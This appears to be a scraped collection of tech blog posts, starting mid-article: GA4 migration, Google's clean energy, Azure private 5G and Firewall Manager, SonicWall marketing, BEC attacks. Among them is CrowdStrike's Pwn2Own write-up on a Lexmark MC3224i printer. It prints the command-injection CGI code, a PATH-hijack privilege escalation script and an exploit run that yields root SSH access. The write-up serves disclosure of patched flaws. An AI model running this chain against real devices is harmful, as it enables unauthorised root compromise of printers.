No Bounce Rate

The bounce rate metric has vanished! It’s been suggested that Google wants to focus on users that stay on your website rather than the ones that leave.

So this has likely been replaced with engagement rate metrics to collect more data on user interactions and engaged sessions.

No Custom Reports

UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts.

A lot of this has changed in GA4. To make it easier for you to understand, here are the UA metrics and their GA4 equivalents:

Custom reports can be found in the Explorations page.
Saved reports are automatically created when you run an Exploration.
Custom alerts can be set up inside custom Insights from the GA4 home page.

One more thing to note is that you also won’t find a way to link Google Search Console with a GA4 property (at the time of writing). And that’s all the key differences between Universal Analytics and Google Analytics 4.

Now you may be wondering whether you HAVE TO make the switch to GA4. A lot of our users have been asking us this question so we’ll tell you quickly what you need to do.

Do I Have To Switch to GA4?

Google will retire Universal Analytics in July 2023. You’ll have access to your UA data for some time but all new data will flow into GA4. If you have a US property set up, you’ll see this warning in your dashboard:

So you have to set up a GA4 property sooner or later and we recommend that you do it sooner. This is because your UA data won’t be transferred to GA4. You have to start afresh.

You can set up your GA4 property now and let it collect data. In the meantime, you can continue to use Universal Analytics and use the time to learn the new GA4 platform. Then when we’re all forced to make the switch, you’ll have plenty of historical data in your GA4 property.

If you haven’t set up your Google Analytics 4 property yet, we’ve compiled an easy step-by step guide for you: How to Set Up Google Analytics 4 in WordPress.

Want to skip the guide and use a tool? Then MonsterInsights is the best to set up GA4. It even lets you create dual tracking profiles so you can have both UA and GA4 running simultaneously.

Get MonsterInsights Now »

After setting up GA4, you can go deeper into your data with these guides:

These posts will help you track your users and their activity on your site so that you can get more valuable insights and analytics data to improve your site’s performance.

Source :
https://www.isitwp.com/google-analytics-4-vs-universal-analytics/

Five years of 100% renewable energy – and a look ahead to a 24/7 carbon-free future

Google operates the cleanest cloud in the industry, and we have long been a leading champion of clean energy around the world. Since we began purchasing renewable energy in 2010, Google has been responsible for more than 60 new clean energy projects with a combined capacity of over 7 gigawatts — about the same as 20 million solar panels. Our long-term support for clean energy projects has contributed to the rapid growth of the industry, remarkable declines in the cost of solar and wind power, and innovative new contracting models and industry partnerships to accelerate corporate clean energy procurement.

Global Corporate PPA Volumes - Chart [June 2022].jpg

In 2021, we were the only major cloud provider to match 100% of the electricity consumption of our operations with renewable energy purchases – a goal we’ve accomplished for the past five years. This establishes Google Cloud as the cleanest cloud in the industry, and is particularly exciting given the rapid expansion of computing conducted in our data centers over the same period. This required significantly ramping up our global renewable energy purchasing: in 2021 alone we signed agreements to buy power from new renewable energy projects with a combined capacity of nearly 1300 MW – expanding our global portfolio by almost 25%.

A new frontier: 24/7 Carbon-Free Energy

Matching our annual energy consumption with renewable energy purchases has been an important step in our sustainability journey, but there are still regions and times of day where clean energy is unavailable and we are forced to rely on fossil fuels to meet our electricity needs. That is why we are now working towards our moonshot goal of operating on 24/7 carbon-free energy (CFE) by 2030, the last step in our journey to fully decarbonize Google’s global operations.

https://youtube.com/watch?v=YhSSW9LAUyw%3Fenablejsapi%3D1%26

Operating on 24/7 CFE is a far more complex and technically challenging goal than matching our annual global energy use with renewable energy purchases. It means matching our electricity demand with carbon-free energy supply every hour of every day, in every region where we operate. No company has achieved this before, and there is no playbook for achieving this.

In the spirit of transparency, today we are releasing the 2021 carbon-free energy percentages (CFE%) for each of Google’s data centers. Globally, Google operated at 66%¹ CFE in 2021 – 5% higher than 2019, but 1% lower than 2020. We expected this kind of short-term fluctuation: building new clean energy is a multi-year process, and our near-term priority is to build strong foundations for long-term CFE growth.

Our largest percentage increases were at our data centers in Chile, at 4%, and Ohio and Virginia, at 4%. In other regions, we encountered significant new headwinds, including a lack of available renewable energy supply and delays to CFE construction due to supply chain disruptions and interconnection challenges. Notably, we also saw flat or declining CFE percentages on the majority of the grids where we operate, underscoring the need for more ambitious action to accelerate grid-level decarbonization everywhere. This is an enormous challenge that requires holistic and long-term solutions, and we are working with our partners across government, industry, and civil society to build a global movement to drive progress at the speed and scale required.

As we work to operate on 24/7 carbon-free energy by 2030, we remain confident in our long-term trajectory and are increasing our focus on regions and times of day where carbon-free energy is not readily available due to resource constraints, policy barriers, or market obstacles. We are building solutions to fill these gaps, including:

New approaches to buying diverse portfolios of carbon-free energy
Projects to advance next-generation technologies like geothermal and batteries
A first-of-its kind carbon-intelligent computing platform to maximize the reduction in grid-level CO2 emissions
Advanced methods for tracking clean energy and maximizing the economic value of clean energy projects
Expanded efforts to advocate for public policies that accelerate grid-level decarbonization

Getting to 24/7 CFE won’t be easy, but we’re optimistic for the future. Our CFE goal is part of our third decade of climate action and company goal of reaching net-zero emissions across our operations and value chain, including our consumer hardware products, by 2030. We aim to reduce the majority of our emissions (versus our 2019 baseline) before 2030, and plan to invest in carbon removal solutions to neutralize our remaining emissions.

We will continue to share our progress and lessons as we work towards our goal, and to work with our partners to accelerate the global transition to a prosperous, carbon-free future.

Source :
https://cloud.google.com/blog/topics/sustainability/5-years-of-100-percent-renewable-energy

Azure powers rapid deployment of private 4G and 5G networks

As the cloud continues to expand into a ubiquitous and highly distributed fabric, a new breed of application is emerging: Modern Connected Applications. We define these new offerings as network-intelligent applications at the edge, powered by 5G, and enabled by programmable interfaces that give developer access to network resources. Along with internet of things (IoT) and real-time AI, 5G is enabling this new app paradigm, unlocking new services and business models for enterprises, while accelerating their network and IT transformation.

At Mobile World Congress this year, Microsoft announced a significant step towards helping enterprises in this journey: Azure Private 5G Core, available as a part of the Azure private multi-access edge compute (MEC) solution. Azure Private 5G Core enables operators and system integrators (SIs) to provide a simple, scalable, and secure deployment of private 4G and 5G networks on small footprint infrastructure, at the enterprise edge.

This blog dives a little deeper into the fundamentals of the service and highlights some extensions that enterprises can leverage to gain more visibility and control over their private network. It also includes a use case of an early deployment of Azure Kubernetes Services (AKS) on an edge platform, leveraged by the Azure Private 5G Core to rapidly deploy such networks.

Building simple, scalable, and secure private networks

Azure Private 5G Core dramatically simplifies the deployment and operation of private networks. With just a few clicks, organizations can deploy a customized set of selectable 5G core functions, radio access network (RAN), and applications on a small edge-compute platform, at thousands of locations. Built-in automation delivers security patches, assures compliance, and performs audits and reporting. Enterprises benefit from a consistent management experience and improved service assurance experience, with all logs and metrics from cloud to edge available for viewing within Azure dashboards.

Enterprises need the highest level of security to connect their mission critical operations. Azure Private 5G Core makes this possible by natively integrating into a broad range of Azure capabilities. With Azure Arc, we provide seamless and secure connectivity from an on-premises edge platform into the Azure cloud. With Azure role-based access control (RBAC), administrators can author policies and define privileges that will allow an application to access all necessary resources. Likewise, users can be given appropriate access to manage all resources in a resource group, such as virtual machines, websites, and subnets. Our Zero Trust security frameworks are integrated from devices to the cloud to keep users and data secure. And our complete, “full-stack” solution (hardware, host and guest operating system, hypervisor, AKS, packet core, IoT Edge Runtime for applications, and more) meets standard Azure privacy and compliance benchmarks in the cloud and on the enterprise edge, meaning that data privacy requirements are adhered to in each geographic region.

Deploying private 5G networks in minutes

Microsoft partner Inventec is a leading design manufacturer of enterprise-class technology solutions like laptops, servers, and wireless communication products. The company has been quick to see the potential benefit in transforming its own world-class manufacturing sites into 5G smart factories to fully utilize the power of AI and IoT.

In a compelling example of rapid private 5G network deployment, Inventec recently installed our Azure private MEC solution in their Taiwan smart factory. It took only 56 minutes to fully deploy the Azure Private 5G Core and connect it to 5G access points that served multiple 5G endpoints—a significant reduction from the months that enterprises have come to expect. Azure Private 5G Core leverages Azure Arc and Azure Kubernetes Service on-prem to provide security and manageability for the entire core network stack. Figures 1 and 2 below show snapshots from the trial.

Figure 1: Screenshot of logs with time stamps showing start and completion of the core network deployment.

Figure 2: Screenshot from the trial showing one access point successfully connected to seven endpoints.

Inventec is developing applications for manufacturing use-cases that leverage private 5G networks and Microsoft’s Azure Private 5G Core. Examples of these high-value MEC use cases include Automatic Optical Inspection (AOI), facial recognition, and security surveillance systems.

Extending enterprise control and visibility from the 5G core

Through close integration with other elements of the Azure private MEC solution, our Azure Private 5G Core essentially acts as an enterprise “control point” for private wireless networks. Through comprehensive APIs, the Azure Private 5G Core can extend visibility into the performance of connected network elements, simplify the provisioning of subscriber identity modules (SIMs) for end devices, secure private wireless deployments, and offer 5G connectivity between cloud services (like IoT Hub) and associated on-premises devices.

Figure 3: Azure Private 5G Core is a central control point for private wireless networks.

Customers, developers, and partners are finding value today with a number of early integrations with both Azure and third-party services that include:

Plug and play RAN: Azure private MEC offers a choice of 4G or 5G Standalone radio access network (RAN) partners that integrate directly with the Azure Private 5G Core. By integrating RAN monitoring with the Azure Private 5G Core, RAN performance can be made visible through the Azure management portal. Our RAN partners are also onboarding their Element Management System (EMS) and Service Management and Orchestrator (SMO) products to Azure, simplifying the deployment processes and have a framework for closed-loop radio performance automation.
Azure Arc managed edge: The Azure Private 5G Core takes advantage of the security and reliability capabilities of Azure Arc-enabled Azure Kubernetes Service running on Azure Stack Edge Pro. These include policy definitions with Azure Policy for Kubernetes, simplified access to AKS clusters for High Availability with Cluster Connect and fine-grained identity and access management with Azure RBAC.
Device and Profile Management: Azure Private 5G Core APIs integrate with SIM management services to securely provision the 5G devices with appropriate profiles. In addition, integration with Azure IoT Hub enables unified management of all connected IoT devices across an enterprise and provides a message hub for IoT telemetry data.
Localized ISV MEC applications: Low-latency MEC applications benefit from running side-by-side with core network functions on the common (Azure private MEC) edge-compute platform. By integrating tightly with the Azure Private 5G Core using Azure Resource Manager APIs, third-party applications can configure network resources and devices. Applications offered by partners are available in, and deployable from the Azure Marketplace.

It’s easy to get started with Azure private MEC

As innovative use cases for private wireless networks continue to develop and industry 4.0 transformation accelerates, we welcome ISVs, platform partners, operators, and SIs to learn more about Azure private MEC.

Application ISVs interested in deploying their industry or horizontal solutions on Azure should begin by onboarding their applications to Azure Marketplace.
Platform partners, operators, and SIs interested in partnering with Microsoft to deploy or integrate with private MEC can get started by reaching out to the Azure private MEC Team.

Microsoft is committed to helping organizations innovate from the cloud, to the edge, and to space—offering the platform and ecosystem strong enough to support the vision and vast potential of 5G. As the cloud continues to expand and a new breed of modern connected apps at the edge emerges, the growth and transformation opportunities for enterprises will be profound. Learn more about how Microsoft is helping developers embrace 5G.

Source :
https://azure.microsoft.com/en-us/blog/azure-powers-rapid-deployment-of-private-4g-and-5g-networks/

Simplify and centralize network security management with Azure Firewall Manager

We are excited to share that Azure Web Application Firewall (WAF) policy and Azure DDoS Protection plan management in Microsoft Azure Firewall Manager is now generally available.

With an increasing need to secure cloud deployments through a Zero Trust approach, the ability to manage network security policies and resources in one central place is a key security measure.

Today, you can now centrally manage Azure Web Application Firewall (WAF) to provide Layer 7 application security to your application delivery platforms, Azure Front Door, and Azure Application Gateway, in your networks and across subscriptions. You can also configure DDoS Protection Standard for protecting your virtual networks from Layer 3 and Layer 4 attacks.

Azure Firewall Manager is a central network security policy and route management service that allows administrators and organizations to protect their networks and cloud platforms at a scale, all in one central place.

Azure Web Application Firewall is a cloud-native web application firewall (WAF) service that provides powerful protection for web apps from common hacking techniques such as SQL injection and security vulnerabilities such as cross-site scripting.

Azure DDoS Protection Standard provides enhanced Distributed Denial-of-Service (DDoS) mitigation features to defend against DDoS attacks. It is automatically tuned to protect all public IP addresses in virtual networks. Protection is simple to enable on any new or existing virtual network and does not require any application or resource changes.

By utilizing both WAF policy and DDoS protection in your network, this provides multi-layered protection across all your essential workloads and applications.

WAF policy and DDoS Protection plan management are an addition to Azure Firewall management in Azure Firewall Manager.

Centrally protect your application delivery platforms using WAF policies

In Azure Firewall Manager, you can now manage and protect your Azure Front Door or Application Gateway deployments by associating WAF policies, at scale. This allows you to view all your key deployments in one central place, alongside Azure Firewall deployments and DDoS Protection plans.

Associating a WAF policy to an Azure Front Door

Upgrade from WAF configuration to WAF policy

In addition, the platform supports administrators to upgrade from a WAF config to WAF policies for Application Gateways, by selecting the service and Upgrade from WAF configuration. This allows for a more seamless process for migrating to WAF policies, which supports WAF policy settings, managed rulesets, exclusions, and disabled rule-groups.

As a note, all WAF configurations that were previously created in Application Gateway can be done through WAF policy.

Upgrading a WAF configuration to WAF policy

Manage DDoS Protection plans for your virtual networks

You can enable DDoS Protection Plan Standard on your virtual networks listed in Azure Firewall Manager, across subscriptions and regions. This allows you to see which virtual networks have Azure Firewall and/or DDoS protection in a single place.

Figure 3: Enabling DDoS Protection Standard on a virtual network in Azure Firewall Manager

View and create WAF policies and DDoS Protection Plans in Azure Firewall Manager

You can view and create WAF policies and DDoS Protection Plans from the Azure Firewall Manager experience, alongside Azure Firewall policies.

In addition, you can import existing WAF policies to create a new WAF policy, so you do not need to start from scratch if you want to maintain similar settings.

Figure 4: View of Web Application Firewall Policies in Azure Firewall Manager

Figure 5: View of DDoS Protection Plans in Azure Firewall Manager

Monitor your overall network security posture

Azure Firewall Manager provides monitoring of your overall network security posture. Here, you can easily see which virtual networks and virtual hubs are protected by Azure Firewall, a third-party security provider, or DDoS Protection Standard. This overview can help you identify and prioritize any security gaps that are in your Azure environment, across subscriptions or for the whole tenant.

Figure 6: Monitoring page in Azure Firewall Manager

Coming soon, you’ll also be able to view your Application Gateway and Azure Front Door monitors, for a full network security overview.

Learn more

To learn more about these features in Azure Firewall Manager, visit the Manage Web Application Firewall policies tutorial, WAF on Application Gateway documentation, and WAF on Azure Front Door documentation. For DDoS information, visit the Configure Azure DDoS Protection Plan using Azure Firewall Manager tutorial and Azure DDoS Protection documentation.

To learn more about Azure Firewall Manager, please visit the Azure Firewall Manager home page.

Source :
https://azure.microsoft.com/en-us/blog/simplify-and-centralize-network-security-management-with-azure-firewall-manager/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product	Lexmark MC3224
Affected Firmware Versions (without claim for completeness)	CXLBL.075.272 (2021-07-29) CXLBL.075.281 (2021-10-14)
Fixed Firmware Version	CXLBL.076.294 (CVE-2021-44735) Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVE	CVE-2021-44735 (Shell Command Injection) CVE-2021-44736 (Authentication Reset)
Root Causes	Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact	Unauthenticated Remote Code Execution (RCE) as root
Researchers	Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources	https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

Request a free CrowdStrike Intelligence threat briefing and learn how to stop adversaries targeting your organization.
Learn how to incorporate intelligence on dangerous threat actors into your security strategy by visiting the CrowdStrike Falcon X™ product page.
Read the CrowdStrike 2022 Global Threat Report.
Learn more about the CrowdStrike Falcon^® platform by visiting the product webpage.
Test CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.

Source :
https://www.crowdstrike.com/blog/how-to-compromise-a-printer-in-3-simple-steps/

Three Keys to Modern Cyberdefense: Affordability, Availability, Efficacy

Choosing a cybersecurity vendor can feel like a never-ending series of compromises. But with SonicWall’s portfolio of high-quality solutions — available at industry-leading TCOs and in stock — it doesn’t have to.

(Our previous supply-chain updates can be found here and here.)

If you’ve ever been to a small-town mechanic, chances are you’ve seen the sign: “We offer three types of service here — Good, Fast and Cheap. Pick any two!”

In cybersecurity, this can be framed as “Affordability, Availability and Efficacy,” but the idea is the same — when making your choice, something’s got to give.

The effects of this mentality are sending ripples across the cybersecurity industry. At the recent 2022 RSA Conference, Joe Hubback of cyber risk management firm ISTARI explained that based on his survey, a full 90% of CISOs, CIOs, government organizations and more reported they aren’t getting the efficacy promised by vendors.

Several reasons for this were discussed, but most came back to this idea of compromise —buyers want products now, and they’re facing budget constraints. So, they often believe the vendors’ claims (which tend to be exaggerated). With little actual evidence or confirmation for these claims available, and little time to evaluate these solutions for themselves, customers are left disappointed.

To make the buying process more transparent and objective, Hubback says, vendor solutions should be evaluated in terms of Capability, Practicality, Quality and Provenance. While his presentation didn’t reference the Affordability-Availability-Efficacy trifecta directly, these ideas are interconnected — and regardless of whether you use either metric or both, SonicWall comes out ahead.

Availability: Supply-Chain Constraints and Lack of Inventory

Order and install times have always been a consideration. But the current climate has led to a paradox in modern cybersecurity: With cyberattack surfaces widening and cybercrime rising, you really ought to have upgraded yesterday. But in many cases, the components you need won’t be in stock for several months.

While many customers are being locked into high-dollar contracts and then being forced to wait for inventory, this isn’t true for SonicWall customers: Our supply chain is fully operational and ready to safeguard your organization.

SonicWall is currently fulfilling 95% of orders within three days.

Procurement Planning & Forecasting

“We’re hearing more often than not that our competitors don’t have the product on the shelf, but we’ve been managing this for nearly two years,” SonicWall Executive Vice President of Operations Yew-Joo Hoe said.

In autumn of 2020, as lead times began to creep up, SonicWall’s operations department immediately began altering internal processes, changing the way it works with suppliers and ships goods, and even re-engineering some products to deliver the same performance with more readily available components.

So now, even amid remarkable growth — 2021 saw a 33% increase in new customer growth, along with a 45% rise in new customer sales — SonicWall is currently fulfilling 95% of orders within three days.

But even as we’ve zeroed in on supply-chain continuity, our dedication to the Provenance of our supply chain has been unwavering. We aim to secure, connect and mobilize organizations operating within approved or authorized regions, territories and countries by ensuring the integrity of our supply chain from start to finish.

SonicWall products are also compliant with the Trade Agreements Act in the U.S., and our practices help ensure SonicWall products aren’t compromised by third parties during the manufacturing process.

Affordability: The Two Facets of TCO

SonicWall’s goal is to deliver industry-leading TCO. But this is more than a marketing message for us — we put it to the test.

SonicWall recently commissioned the Tolly Group to evaluate the SonicWall NSsp 13700, the NSsp 15700, the NSa 2700 and more against equivalent competitor products. Each time, the SonicWall product was named the better value, saving customers thousands, tens of thousands and even hundreds of thousands while delivering superior threat protection.

But we also recognize that the measure of a product’s affordability extends beyond the number on an order sheet, to how much labor that solution requires. Hubback summarized the idea of Practicality as “Is this actually something I can use in my company without needing some kind of Top Gun pilot to fly it and make it work?” With cybersecurity professionals getting harder to find, and their experience becoming more expensive every day, the ideas of Practicality and Affordability have never been so intertwined.

Fortunately, SonicWall has long recognized this association, and we’ve built our products to reduce both the amount of human intervention and the required skill level needed to run our solutions.

Innovations such as Zero-Touch Deployment, cloud-based management, single-pane-of-glass interfaces, simplified policy creation and management, and one-click rollback in the event of a breach have brought increased simplicity to our portfolio without sacrificing performance or flexibility.

Efficacy: How It’s Built and How It Performs

Hubback’s final two criteria, Quality and Capability, describe how well a solution is built, and how well it can do what it promises. Taken together, these form the core of what we think of as Efficacy.

While Quality is the most enigmatic of Hubback’s criteria, it can be reasonably ascertained based on a handful of factors, such as longevity, customer satisfaction and growth.

With over 30 years of experience, SonicWall is a veteran cybersecurity leader trusted by SMBs, enterprises and government agencies around the globe. In the crowded cybersecurity market, this sort of longevity isn’t possible without quality offerings — and our quantity of repeat purchasers and scores of customer case studies attest to the high standards we maintain for every solution we build.

In contrast, Capability can be very easy to judge — if a vendor chooses to put its products to the test. Independent, third-party evaluation is the gold standard for determining whether products live up to their promises. And based on this metric, SonicWall comes out on top.

To provide customers objective information about its performance, SonicWall Capture ATP with RTDMI has been evaluated by third-party testing firm ICSA Labs, an independent division of Verizon. For the past five consecutive quarters, the solution has found 100% of the threats without issuing a single false positive. SonicWall has now earned more perfect scores — and more back-to-back perfect scores — than any other active vendor.

Today, thousands of organizations will shop for new or upgraded cybersecurity solutions. While they may differ in size, industry, use case and more, at the end of the day, they’re all looking for basically the same thing: A reliable solution that performs as advertised, at a price that fits within their budget, that can be up and running as soon as possible.

There will always be those who tell you that you can’t have everything; that the center of this Venn diagram will always be empty. But at SonicWall, we refuse to compromise — and we think you should, too.

Source :
https://blog.sonicwall.com/en-us/2022/06/three-keys-to-modern-cyberdefense-affordability-availability-efficacy/

BEC Attacks: Can You Stop the Imposters in Your Inbox?

BEC attacks are a $1.8 billion dollar racket — and statistically, your business will be targeted sooner rather than later. Watch this webinar to learn how to stop them.

If asked which of the threat types tracked by the FBI causes the most financial damage, most people would say ransomware.

They’d be wrong.

In 2021, the FBI’s Internet Crime Complaint Center (IC3) received 19,954 Business Email Compromise (BEC) reports, with adjusted losses totaling almost $2.4 billion. That’s an average of more than $120,270 per incident, compared with just under $13,200 per incident for ransomware attacks.

Since the FBI began tracking these threats in 2013, tens of billions in financial losses have been recorded, resulting from nearly 170,000 incidents in 178 countries.

So why hasn’t this threat risen to the notoriety of ransomware?

During many ransomware attacks, business operations grind to a halt. When a company loses access to customer information, payment systems and mission-critical applications, it often becomes clear in short order that something is wrong.

But BEC attacks are comparatively silent. Even when these attacks have a huge impact on an organization’s bottom line, operations can generally continue as usual. As a result, businesses frequently opt to keep these attacks out of the public eye to avoid risking reputation damage and loss of trust.

But although ransomware still dominates security news, the growing frequency, volume and cost of BEC attacks have begun attracting more attention.

As a result, BEC attacks have become a top threat concern for many organizations today, according to a recent SonicWall-sponsored white paper by Osterman Research. “How to Deal with Business Email Compromise” reports primary research data from an in-depth customer survey of 119 respondents, each of which has direct knowledge of how their organization is addressing or planning to address the risk of BEC.

